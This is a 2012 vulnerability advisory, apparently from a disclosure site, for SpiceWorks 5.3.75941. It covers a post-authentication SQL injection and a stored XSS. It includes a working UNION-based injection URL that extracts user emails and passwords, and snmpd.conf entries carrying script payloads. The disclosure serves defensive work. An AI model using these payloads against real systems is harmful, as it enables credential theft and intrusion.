SpiceWorks 5.3.75941 Stored XSS and SQL Injection

2012.07.24
Credit: muts
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89
CWE-79


CVSS Base Score: 6.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Product: SpiceWorks Version: 5.3.75941 Vendor Site: http://www.spiceworks.com/community/ Software Download Link: http://www.spiceworks.com/download/?utm_source=comm-secondary-link&utm_medium=website&utm_campaign=homepage Installer Filename: Spiceworks.exe MD5: 023bd361c0f9402dc07adbc5a72fe31d Contact: http://www.spiceworks.com/contact/ Timeline: 04 Jun 2012: Vulnerability reported to CERT 08 Jun 2012: Response received from CERT with disclosure date of 20 Jul 2012 23 Jul 2012: Updated received from CERT: No response from vendor 23 Jul 2012: Public Disclosure SQL Injection (Post-Authentication): http://server/api_v2.json?queries[device][class]=Device&queries[device][select]=id,b_manufacturer,manufacturer,b_model,model,operating_system,device_type&queries[device][conditions]=id=14%29%20UNION%20SELECT%20NULL,%20NULL,%20NULL,%20email,%20NULL,%20NULL,%20password%20from%20users%20where%20id=1-- Stored XSS: An attacker can configure their snmpd.conf file to contain malicious JavaScript as shown in the proof of concept below: rocommunity public com2sec local localhost public view systemview included .1.3.6.1.2.1.1 view systemview included .1.3.6.1.2.1.25.1.1 view systemview included .1 80 syslocation <script>alert('location')</script> syscontact <script>alert('contact')</script> sysName dook<script>alert('name')</script>

References:

http://www.spiceworks.com/download/?utm_source=comm-secondary-link&utm_medium=website&utm_campaign=homepage


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top